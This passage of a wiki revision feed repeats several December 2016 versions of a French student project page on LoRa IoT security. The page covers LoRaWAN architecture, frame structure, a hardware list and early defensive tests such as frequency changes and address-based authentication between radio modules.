 | http://fr.farnell.com/transcend/ts4gsdhc10/carte-sdhc-4gb-classe-10/dp/2290237 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Alimentation Raspberry Pi &lt;br /&gt;
 | 3&lt;br /&gt;
 | 8,05 € &lt;br /&gt;
 | 24,15 € &lt;br /&gt;
 | http://fr.farnell.com/stontronics/t6090dv/psu-raspberry-pi-5v-2-5a-uk-euro/dp/2520786 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 &lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
= Montage =&lt;br /&gt;
&lt;br /&gt;
==Communication== &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Les Feather LoRa reçus, j'ai commencé à souder des fils de 16.5cm (pour 433 MHz) de long pour qu'ils servent d'antenne.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:antenne.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
J'ai commencé par prendre l'exemple fourni par le site adafruit pour voir si les modules fonctionnaient correctement.&lt;br /&gt;
&lt;br /&gt;
En utilisant un module comme émetteur et un autre comme récepteur, on obtient ces résultats :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Transmission.PNG|550px]]&lt;br /&gt;
[[Fichier:Reception.PNG|550px]]&lt;br /&gt;
&lt;br /&gt;
Les modules communiquent bien et se répondent.&lt;br /&gt;
&lt;br /&gt;
Les messages sont envoyés en clair et peuvent être  interceptés par tout le monde et dans un grand périmètre puisque la portée peut être de plusieurs kilomètres.&lt;br /&gt;
&lt;br /&gt;
De ce programme, j'ai déduit plusieurs fonctionnalités pour sécuriser la liaison.&lt;br /&gt;
&lt;br /&gt;
== Changement de fréquence==&lt;br /&gt;
&lt;br /&gt;
La fréquence du module LoRa est prévu pour 433 MHz. Cependant j'ai pu noter que changer cette fréquence pour l'émetteur et le récepteur garantissait toujours un bon fonctionnement si on ne dépasse pas certaines valeurs. D'après quelques tests, la plaque de fréquence peut varier de 390 à 550 MHz (faire plus de tests pour trouver les limites). &lt;br /&gt;
&lt;br /&gt;
Mais le récepteur et le transmetteur doivent être sur la même fréquence à 0.02 MHz près. On peut en déduire plusieurs centaines plages de fréquence juste pour le module 433 MHz.&lt;br /&gt;
&lt;br /&gt;
Un désavantage de cacher ces messages dans des fréquences précises est que si l'émetteur transmet des paquets en continu, on peut scanner certaines fréquences jusqu'à recevoir un paquet et connaître la fréquence précise. Cependant, les module LoRa émettent rarement en continu mais plutôt à des  temps définis et très peu de paquets.&lt;br /&gt;
&lt;br /&gt;
==Authentification ==&lt;br /&gt;
&lt;br /&gt;
Un problème pouvant survenir lorsque plusieurs récepteurs sont allumés et que des transmissions arrivent est que les récepteurs ne sauront pas à qui est destiné le paquet.&lt;br /&gt;
&lt;br /&gt;
===Authentification en 1 étape===&lt;br /&gt;
&lt;br /&gt;
L'émetteur envoie un paquet avec son adresse, l'adresse de destination, puis le message. Le récepteur peut checker si le message lui est dédié et par qui il est envoyé. &lt;br /&gt;
&lt;br /&gt;
Le désavantage est que si quelqu'un intercepte le message, il connaît les adresses des modules et peut envoyer des paquets en se faisant passer pour un émetteur. &lt;br /&gt;
 &lt;br /&gt;
=== Authentification en 2 étapes ===&lt;br /&gt;
&lt;br /&gt;
J'ai créée un programme pour que l'émetteur et le récepteur aient une adresse définie à l'avance et ne puissent parler qu'entre eux.&lt;br /&gt;
&lt;br /&gt;
L'émetteur envoie un paquet contenant l'adresse du récepteur. Si le récepteur reçoit le paquet et que l'adresse correspond à la sienne, il renvoie un paquet avec l'adresse de l'émetteur.&lt;br /&gt;
&lt;br /&gt;
L'émetteur ayant reconnu son adresse, il envoie le paquet contenant le message et le récepteur peut stocker les informations reçus.&lt;br /&gt;
&lt;br /&gt;
Ce programme n'a été réalisé qu'entre 2 modules. Le premier problème est que si plusieurs émetteurs doivent envoyer des paquets au même récepteur, il ne sait pas quel émetteur lui a envoyé un paquet. &lt;br /&gt;
&lt;br /&gt;
Il faudrait donc qu'un récepteur ait seulement un émetteur affilié. De plus les adresses circulent en clair et quelqu'un peut recevoir les adresses et envoyer des paquets aux modules en essayant de deviner si l'adresse est au récepteur ou à l'émetteur.&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35701</id>
		<title>P64 Sécurité de l'IOT</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35701"/>
				<updated>2016-12-07T12:30:55Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Montage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Objectif du PFE=&lt;br /&gt;
&lt;br /&gt;
L’internet des objets (IoT) se démocratise de plus en plus dans nos appareils électroniques et la question de la sécurité se pose. Si un de ces objets connait une défaillance, l’ensemble des données lié à son réseau pourrait être compromises.&lt;br /&gt;
L’objectif de ce PFE est d’analyser le protocole réseau LORA et de déceler les failles de sécurité afin de les corriger.&lt;br /&gt;
&lt;br /&gt;
=Réseau LoRa=&lt;br /&gt;
&lt;br /&gt;
Le réseau LoRa ( Long Range ) est une technologie permettant aux objets connectés d’échanger des données de petites tailles. Le débit du réseau varie de 0,3 kb/s à 50 kb/s. La première utilité est que la consommation des objets est très faible garantissant une autonomie allant jusqu’à 10 ans. La portée maximale est d’environ 20km.&lt;br /&gt;
L'architecture du réseau LoRaWan est utilisée sous forme de réseau hiérarchique où chaque passerelle peut transmettre les messages entre les appareils terminaux et un serveur de réseau central en arrière-plan.&lt;br /&gt;
&lt;br /&gt;
Le protocole LoRa a 3 modes de fonctionnement:&lt;br /&gt;
&lt;br /&gt;
*L’envoi d’informations vers une antenne puis la réception d’informations immédiatement après. Le serveur ne pourra envoyer d’informations qu’au prochain cycle d’envoi. Ce mode à la moins grande consommation d’énergie et permet d’envoyer des données de manière régulière ( ex: capteur).  La portée maximale est d’environ 20 km en zone rurale et 1 km en zone urbaine.&lt;br /&gt;
&lt;br /&gt;
*La réception de données à intervalles réguliers et paramétrés à l’avance.&lt;br /&gt;
&lt;br /&gt;
* La réception d’informations en continu, c’est le mode qui consomme le plus.&lt;br /&gt;
&lt;br /&gt;
L’alliance LoRa a publié un programme de certification obligatoire consistant à vérifier que l’objet connecté répond aux contraintes fonctionnelles du standard LoRaWAN.&lt;br /&gt;
 &lt;br /&gt;
La bande utilisée est 868 MHz et 900 MHZ. Elle est assez large pour protéger le signal des interférences dù à l’environnement.&lt;br /&gt;
&lt;br /&gt;
==Composants du réseau LoRa==&lt;br /&gt;
&lt;br /&gt;
La solution LoRa est constitué de Nodes (noeuds) et de Gateways (passerelles) qui communiquent avec le serveur réseau. &lt;br /&gt;
&lt;br /&gt;
*Les noeuds sont utilisés pour mesurer des valeurs ou contrôler des systèmes externes. Ils ont une faible alimentation et communiquent par réseau sans fil avec un ou plusieurs passerelles. Les noeuds sont équipés d’un transmetteur LoRa géré par un microcontrôleur. Le microcontrôleur peut envoyer des commandes au transmetteur pour configurer les paramètres du réseau LoRa ou envoyer et recevoir des données d’application que le transmetteur enverra au réseau serveur par la passerelle.&lt;br /&gt;
Les noeuds sont usuellement en mode “call then listen”, ce qui veut dire que le noeud enverra des données au serveur et écoutera pendant une courte durée la réponse du serveur.&lt;br /&gt;
&lt;br /&gt;
*Les passerelles sont moins nombreuses et transfèrent les données depuis les noeuds jusqu’au serveur réseau en utilisant des connections IP standards. &lt;br /&gt;
La solution LoRa a donc une topologie “star of star”; où plusieurs noeuds communiquent à une ou plusieurs passerelles, qui communiquent à un serveur réseau unique.&lt;br /&gt;
Les passerelles n’ont pas de mesures de sécurités mais fonctionnent comme un tunnel entre les noeuds et le serveur.&lt;br /&gt;
&lt;br /&gt;
*Le serveur réseau représente le stockage des données envoyées depuis les noeuds. Il est la plupart du temps une interface web où les passerelles se connectent en utilisant le réseau cellulaire.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Schéma lora.png|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==LoRa Frame structure==&lt;br /&gt;
&lt;br /&gt;
La transmission d’un noeud à une passerelle est appelée uplink (liaison montante) et de la passerelle à un noeud downlink ( liaison descendante). Il y a 3 classes de réseau LoRaWAn : classe A, B et C. Les classes ont des frames différentes de uplink et downlink.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe A sont ceux qui consomment le moins niveau énergétique.&lt;br /&gt;
Lorsqu’un uplink est transmis, 2 fenêtres de downlink sont envoyés en réponse. La fréquence des transmissions est défini par le noeud.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe B sont similaires aux classes A mais ont plus de fenêtres de downlink, définis par les passerelles.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe C sont en écoute permanente et sont donc toujours en downlink lorsqu’ils n’émettent pas en uplink. C’est le mode le plus consommateur en énergie mais il a moins de latence comparé aux autres pour la communication entre noeud et serveur.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Frame lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
==Pile de protocole LoRa==&lt;br /&gt;
&lt;br /&gt;
La pile de protocole LoRa est composée de 4 couches : &lt;br /&gt;
&lt;br /&gt;
* Couche Application LoRa &lt;br /&gt;
&lt;br /&gt;
* Couche MAC LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche Physique LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche RF LoRa&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Couche lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche MAC contient les données relatives à la classe du noeud et varie selon son type.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Lora phy layer.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche physique construit le paquet pour transmettre l'information de la couche MAC à la couche radio.&lt;br /&gt;
La couche Radio PHY contient un préambule ( 8 octets ), un entête et des contrôles de redondance cycliques pour le PHY Payload et l’entête.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La couche PHY Payload commence par un entête MAC suivi d'un MAC Payload et d’un check d’intégrité du paquet. L’entête et le Payload contiennent les données de l’utilisateur plus des informations relatives au type de message et sur la version LoRa utilisée.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le Payload MAC est constitué d'un entête comportant les adresses de la source et de la destination ainsi qu'un frame counter pour protéger le message. Il est aussi formé d'un Frame port et d'un Frame Pyload qui contiennent les données de l'application. Le Frame Port est aussi utilisé pour déterminer si le message contient seulement des commandes MAC ou des données spécifiques à l'application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Schéma de la communication==&lt;br /&gt;
[[Fichier:Schéma com lora.png]]&lt;br /&gt;
&lt;br /&gt;
==Matériel==&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
 ! Matériel !! Quantité !!Prix à l'unité !! Prix Total !! URL !! statut&lt;br /&gt;
|-&lt;br /&gt;
 ! RF Adafruit Feather M0 RFM96 &lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,97 € &lt;br /&gt;
 | 95.91€  &lt;br /&gt;
 |http://www.mouser.fr/ProductDetail/Adafruit/3179/?qs=sGAEpiMZZMuC4zZxLL0ZTXmUcMwoRc9uEac7jsWPYbgAg4D4CJduaQ%3d%3d&lt;br /&gt;
 |Recu&lt;br /&gt;
 |-&lt;br /&gt;
! Raspberry PI&lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,41 € &lt;br /&gt;
 | 94.23 € &lt;br /&gt;
 | http://fr.farnell.com/raspberry-pi/raspberrypi-modb-1gb/raspberry-pi-3-model-b/dp/2525225&lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Carte SD 4 Go &lt;br /&gt;
 | 3&lt;br /&gt;
 | 14,58 € &lt;br /&gt;
 | 43.74 € &lt;br /&gt;
 | http://fr.farnell.com/transcend/ts4gsdhc10/carte-sdhc-4gb-classe-10/dp/2290237 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Alimentation Raspberry Pi &lt;br /&gt;
 | 3&lt;br /&gt;
 | 8,05 € &lt;br /&gt;
 | 24,15 € &lt;br /&gt;
 | http://fr.farnell.com/stontronics/t6090dv/psu-raspberry-pi-5v-2-5a-uk-euro/dp/2520786 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 &lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
= Montage =&lt;br /&gt;
&lt;br /&gt;
==Communication== &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Les Feather LoRa reçus, j'ai commencé à souder des fils de 16.5cm (pour 433 MHz) de long pour qu'ils servent d'antenne.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:antenne.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
J'ai commencé par prendre l'exemple fourni par le site adafruit pour voir si les modules fonctionnaient correctement.&lt;br /&gt;
&lt;br /&gt;
En utilisant un module comme émetteur et un autre comme récepteur, on obtient ces résultats :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Transmission.PNG|550px]]&lt;br /&gt;
[[Fichier:Reception.PNG|550px]]&lt;br /&gt;
&lt;br /&gt;
Les modules communiquent bien et se répondent.&lt;br /&gt;
&lt;br /&gt;
Les messages sont envoyés en clair et peuvent être  interceptés par tout le monde et dans un grand périmètre puisque la portée peut être de plusieurs kilomètres.&lt;br /&gt;
&lt;br /&gt;
De ce programme, j'ai déduit plusieurs fonctionnalités pour sécuriser la liaison.&lt;br /&gt;
&lt;br /&gt;
== Changement de fréquence==&lt;br /&gt;
&lt;br /&gt;
La fréquence du module LoRa est prévu pour 433 MHz. Cependant j'ai pu noter que changer cette fréquence pour l'émetteur et le récepteur garantissait toujours un bon fonctionnement si on ne dépasse pas certaines valeurs. D'après quelques tests, la plaque de fréquence peut varier de 390 à 550 MHz (faire plus de tests pour trouver les limites). &lt;br /&gt;
&lt;br /&gt;
Mais le récepteur et le transmetteur doivent être sur la même fréquence à 0.02 MHz près. On peut en déduire plusieurs centaines plages de fréquence juste pour le module 433 MHz.&lt;br /&gt;
&lt;br /&gt;
Un désavantage de cacher ces messages dans des fréquences précises est que si l'émetteur transmet des paquets en continu, on peut scanner certaines fréquences jusqu'à recevoir un paquet et connaître la fréquence précise. Cependant, les module LoRa émettent rarement en continu mais plutôt à des  temps définis et très peu de paquets.&lt;br /&gt;
&lt;br /&gt;
==Authentification ==&lt;br /&gt;
&lt;br /&gt;
Un problème pouvant survenir lorsque plusieurs récepteurs sont allumés et que des transmissions arrivent est que les récepteurs ne sauront pas à qui est destiné le paquet.&lt;br /&gt;
&lt;br /&gt;
===Authentification en 1 étape===&lt;br /&gt;
&lt;br /&gt;
L'émetteur envoie un paquet avec son adresse, l'adresse de destination, puis le message. Le récepteur peut checker si le message lui est dédié et par qui il est envoyé. &lt;br /&gt;
&lt;br /&gt;
Le désavantage est que si quelqu'un intercepte le message, il connaît les adresses des modules et peut envoyer des paquets en se faisant passer pour un émetteur. &lt;br /&gt;
 &lt;br /&gt;
=== Authentification en 2 étapes ===&lt;br /&gt;
&lt;br /&gt;
J'ai créée un programme pour que l'émetteur et le récepteur aient une adresse définies à l'avance et ne puissent parler qu'entre eux.&lt;br /&gt;
&lt;br /&gt;
L'émetteur envoie un paquet contenant l'adresse du récepteur. Si le récepteur reçoit le paquet et que l'adresse correspond à la sienne, il renvoie un paquet avec l'adresse de l'émetteur.&lt;br /&gt;
&lt;br /&gt;
L'émetteur ayant reconnu son adresse, il envoie le paquet contenant le message et le récepteur peut stocker les informations reçus.&lt;br /&gt;
&lt;br /&gt;
Ce programme n'a été réalisé qu'entre 2 modules. Le premier problème est que si plusieurs émetteurs doivent envoyer des paquets au même récepteur, il ne sait pas quel émetteur lui a envoyé un paquet.&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35700</id>
		<title>P64 Sécurité de l'IOT</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35700"/>
				<updated>2016-12-07T12:30:10Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Objectif du PFE=&lt;br /&gt;
&lt;br /&gt;
L’internet des objets (IoT) se démocratise de plus en plus dans nos appareils électroniques et la question de la sécurité se pose. Si un de ces objets connait une défaillance, l’ensemble des données lié à son réseau pourrait être compromises.&lt;br /&gt;
L’objectif de ce PFE est d’analyser le protocole réseau LORA et de déceler les failles de sécurité afin de les corriger.&lt;br /&gt;
&lt;br /&gt;
=Réseau LoRa=&lt;br /&gt;
&lt;br /&gt;
Le réseau LoRa ( Long Range ) est une technologie permettant aux objets connectés d’échanger des données de petites tailles. Le débit du réseau varie de 0,3 kb/s à 50 kb/s. La première utilité est que la consommation des objets est très faible garantissant une autonomie allant jusqu’à 10 ans. La portée maximale est d’environ 20km.&lt;br /&gt;
L'architecture du réseau LoRaWan est utilisée sous forme de réseau hiérarchique où chaque passerelle peut transmettre les messages entre les appareils terminaux et un serveur de réseau central en arrière-plan.&lt;br /&gt;
&lt;br /&gt;
Le protocole LoRa a 3 modes de fonctionnement:&lt;br /&gt;
&lt;br /&gt;
*L’envoi d’informations vers une antenne puis la réception d’informations immédiatement après. Le serveur ne pourra envoyer d’informations qu’au prochain cycle d’envoi. Ce mode à la moins grande consommation d’énergie et permet d’envoyer des données de manière régulière ( ex: capteur).  La portée maximale est d’environ 20 km en zone rurale et 1 km en zone urbaine.&lt;br /&gt;
&lt;br /&gt;
*La réception de données à intervalles réguliers et paramétrés à l’avance.&lt;br /&gt;
&lt;br /&gt;
* La réception d’informations en continu, c’est le mode qui consomme le plus.&lt;br /&gt;
&lt;br /&gt;
L’alliance LoRa a publié un programme de certification obligatoire consistant à vérifier que l’objet connecté répond aux contraintes fonctionnelles du standard LoRaWAN.&lt;br /&gt;
 &lt;br /&gt;
La bande utilisée est 868 MHz et 900 MHZ. Elle est assez large pour protéger le signal des interférences dù à l’environnement.&lt;br /&gt;
&lt;br /&gt;
==Composants du réseau LoRa==&lt;br /&gt;
&lt;br /&gt;
La solution LoRa est constitué de Nodes (noeuds) et de Gateways (passerelles) qui communiquent avec le serveur réseau. &lt;br /&gt;
&lt;br /&gt;
*Les noeuds sont utilisés pour mesurer des valeurs ou contrôler des systèmes externes. Ils ont une faible alimentation et communiquent par réseau sans fil avec un ou plusieurs passerelles. Les noeuds sont équipés d’un transmetteur LoRa géré par un microcontrôleur. Le microcontrôleur peut envoyer des commandes au transmetteur pour configurer les paramètres du réseau LoRa ou envoyer et recevoir des données d’application que le transmetteur enverra au réseau serveur par la passerelle.&lt;br /&gt;
Les noeuds sont usuellement en mode “call then listen”, ce qui veut dire que le noeud enverra des données au serveur et écoutera pendant une courte durée la réponse du serveur.&lt;br /&gt;
&lt;br /&gt;
*Les passerelles sont moins nombreuses et transfèrent les données depuis les noeuds jusqu’au serveur réseau en utilisant des connections IP standards. &lt;br /&gt;
La solution LoRa a donc une topologie “star of star”; où plusieurs noeuds communiquent à une ou plusieurs passerelles, qui communiquent à un serveur réseau unique.&lt;br /&gt;
Les passerelles n’ont pas de mesures de sécurités mais fonctionnent comme un tunnel entre les noeuds et le serveur.&lt;br /&gt;
&lt;br /&gt;
*Le serveur réseau représente le stockage des données envoyées depuis les noeuds. Il est la plupart du temps une interface web où les passerelles se connectent en utilisant le réseau cellulaire.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Schéma lora.png|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==LoRa Frame structure==&lt;br /&gt;
&lt;br /&gt;
La transmission d’un noeud à une passerelle est appelée uplink (liaison montante) et de la passerelle à un noeud downlink ( liaison descendante). Il y a 3 classes de réseau LoRaWAn : classe A, B et C. Les classes ont des frames différentes de uplink et downlink.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe A sont ceux qui consomment le moins niveau énergétique.&lt;br /&gt;
Lorsqu’un uplink est transmis, 2 fenêtres de downlink sont envoyés en réponse. La fréquence des transmissions est défini par le noeud.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe B sont similaires aux classes A mais ont plus de fenêtres de downlink, définis par les passerelles.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe C sont en écoute permanente et sont donc toujours en downlink lorsqu’ils n’émettent pas en uplink. C’est le mode le plus consommateur en énergie mais il a moins de latence comparé aux autres pour la communication entre noeud et serveur.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Frame lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
==Pile de protocole LoRa==&lt;br /&gt;
&lt;br /&gt;
La pile de protocole LoRa est composée de 4 couches : &lt;br /&gt;
&lt;br /&gt;
* Couche Application LoRa &lt;br /&gt;
&lt;br /&gt;
* Couche MAC LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche Physique LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche RF LoRa&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Couche lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche MAC contient les données relatives à la classe du noeud et varie selon son type.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Lora phy layer.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche physique construit le paquet pour transmettre l'information de la couche MAC à la couche radio.&lt;br /&gt;
La couche Radio PHY contient un préambule ( 8 octets ), un entête et des contrôles de redondance cycliques pour le PHY Payload et l’entête.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La couche PHY Payload commence par un entête MAC suivi d'un MAC Payload et d’un check d’intégrité du paquet. L’entête et le Payload contiennent les données de l’utilisateur plus des informations relatives au type de message et sur la version LoRa utilisée.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le Payload MAC est constitué d'un entête comportant les adresses de la source et de la destination ainsi qu'un frame counter pour protéger le message. Il est aussi formé d'un Frame port et d'un Frame Pyload qui contiennent les données de l'application. Le Frame Port est aussi utilisé pour déterminer si le message contient seulement des commandes MAC ou des données spécifiques à l'application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Schéma de la communication==&lt;br /&gt;
[[Fichier:Schéma com lora.png]]&lt;br /&gt;
&lt;br /&gt;
==Matériel==&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
 ! Matériel !! Quantité !!Prix à l'unité !! Prix Total !! URL !! statut&lt;br /&gt;
|-&lt;br /&gt;
 ! RF Adafruit Feather M0 RFM96 &lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,97 € &lt;br /&gt;
 | 95.91€  &lt;br /&gt;
 |http://www.mouser.fr/ProductDetail/Adafruit/3179/?qs=sGAEpiMZZMuC4zZxLL0ZTXmUcMwoRc9uEac7jsWPYbgAg4D4CJduaQ%3d%3d&lt;br /&gt;
 |Recu&lt;br /&gt;
 |-&lt;br /&gt;
! Raspberry PI&lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,41 € &lt;br /&gt;
 | 94.23 € &lt;br /&gt;
 | http://fr.farnell.com/raspberry-pi/raspberrypi-modb-1gb/raspberry-pi-3-model-b/dp/2525225&lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Carte SD 4 Go &lt;br /&gt;
 | 3&lt;br /&gt;
 | 14,58 € &lt;br /&gt;
 | 43.74 € &lt;br /&gt;
 | http://fr.farnell.com/transcend/ts4gsdhc10/carte-sdhc-4gb-classe-10/dp/2290237 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Alimentation Raspberry Pi &lt;br /&gt;
 | 3&lt;br /&gt;
 | 8,05 € &lt;br /&gt;
 | 24,15 € &lt;br /&gt;
 | http://fr.farnell.com/stontronics/t6090dv/psu-raspberry-pi-5v-2-5a-uk-euro/dp/2520786 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 &lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
= Montage =&lt;br /&gt;
&lt;br /&gt;
Les Feather LoRa reçus, j'ai commencé à souder des fils de 16.5cm (pour 433 MHz) de long pour qu'ils servent d'antenne.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:antenne.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
J'ai commencé par prendre l'exemple fourni par le site adafruit pour voir si les modules fonctionnaient correctement.&lt;br /&gt;
&lt;br /&gt;
En utilisant un module comme émetteur et un autre comme récepteur, on obtient ces résultats :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Transmission.PNG|550px]]&lt;br /&gt;
[[Fichier:Reception.PNG|550px]]&lt;br /&gt;
&lt;br /&gt;
Les modules communiquent bien et se répondent.&lt;br /&gt;
&lt;br /&gt;
Les messages sont envoyés en clair et peuvent être  interceptés par tout le monde et dans un grand périmètre puisque la portée peut être de plusieurs kilomètres.&lt;br /&gt;
&lt;br /&gt;
De ce programme, j'ai déduit plusieurs fonctionnalités pour sécuriser la liaison.&lt;br /&gt;
&lt;br /&gt;
== Changement de fréquence==&lt;br /&gt;
&lt;br /&gt;
La fréquence du module LoRa est prévu pour 433 MHz. Cependant j'ai pu noter que changer cette fréquence pour l'émetteur et le récepteur garantissait toujours un bon fonctionnement si on ne dépasse pas certaines valeurs. D'après quelques tests, la plaque de fréquence peut varier de 390 à 550 MHz (faire plus de tests pour trouver les limites). &lt;br /&gt;
&lt;br /&gt;
Mais le récepteur et le transmetteur doivent être sur la même fréquence à 0.02 MHz près. On peut en déduire plusieurs centaines plages de fréquence juste pour le module 433 MHz.&lt;br /&gt;
&lt;br /&gt;
Un désavantage de cacher ces messages dans des fréquences précises est que si l'émetteur transmet des paquets en continu, on peut scanner certaines fréquences jusqu'à recevoir un paquet et connaître la fréquence précise. Cependant, les module LoRa émettent rarement en continu mais plutôt à des  temps définis et très peu de paquets.&lt;br /&gt;
&lt;br /&gt;
==Authentification ==&lt;br /&gt;
&lt;br /&gt;
Un problème pouvant survenir lorsque plusieurs récepteurs sont allumés et que des transmissions arrivent est que les récepteurs ne sauront pas à qui est destiné le paquet.&lt;br /&gt;
&lt;br /&gt;
===Authentification en 1 étape===&lt;br /&gt;
&lt;br /&gt;
L'émetteur envoie un paquet avec son adresse, l'adresse de destination, puis le message. Le récepteur peut checker si le message lui est dédié et par qui il est envoyé. &lt;br /&gt;
&lt;br /&gt;
Le désavantage est que si quelqu'un intercepte le message, il connaît les adresses des modules et peut envoyer des paquets en se faisant passer pour un émetteur. &lt;br /&gt;
 &lt;br /&gt;
=== Authentification en 2 étapes ===&lt;br /&gt;
&lt;br /&gt;
J'ai créée un programme pour que l'émetteur et le récepteur aient une adresse définies à l'avance et ne puissent parler qu'entre eux.&lt;br /&gt;
&lt;br /&gt;
L'émetteur envoie un paquet contenant l'adresse du récepteur. Si le récepteur reçoit le paquet et que l'adresse correspond à la sienne, il renvoie un paquet avec l'adresse de l'émetteur.&lt;br /&gt;
&lt;br /&gt;
L'émetteur ayant reconnu son adresse, il envoie le paquet contenant le message et le récepteur peut stocker les informations reçus.&lt;br /&gt;
&lt;br /&gt;
Ce programme n'a été réalisé qu'entre 2 modules. Le premier problème est que si plusieurs émetteurs doivent envoyer des paquets au même récepteur, il ne sait pas quel émetteur lui a envoyé un paquet.&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35699</id>
		<title>P64 Sécurité de l'IOT</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35699"/>
				<updated>2016-12-07T10:40:46Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Authentification */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Objectif du PFE=&lt;br /&gt;
&lt;br /&gt;
L’internet des objets (IoT) se démocratise de plus en plus dans nos appareils électroniques et la question de la sécurité se pose. Si un de ces objets connait une défaillance, l’ensemble des données lié à son réseau pourrait être compromises.&lt;br /&gt;
L’objectif de ce PFE est d’analyser le protocole réseau LORA et de déceler les failles de sécurité afin de les corriger.&lt;br /&gt;
&lt;br /&gt;
=Réseau LoRa=&lt;br /&gt;
&lt;br /&gt;
Le réseau LoRa ( Long Range ) est une technologie permettant aux objets connectés d’échanger des données de petites tailles. Le débit du réseau varie de 0,3 kb/s à 50 kb/s. La première utilité est que la consommation des objets est très faible garantissant une autonomie allant jusqu’à 10 ans. La portée maximale est d’environ 20km.&lt;br /&gt;
L'architecture du réseau LoRaWan est utilisée sous forme de réseau hiérarchique où chaque passerelle peut transmettre les messages entre les appareils terminaux et un serveur de réseau central en arrière-plan.&lt;br /&gt;
&lt;br /&gt;
Le protocole LoRa a 3 modes de fonctionnement:&lt;br /&gt;
&lt;br /&gt;
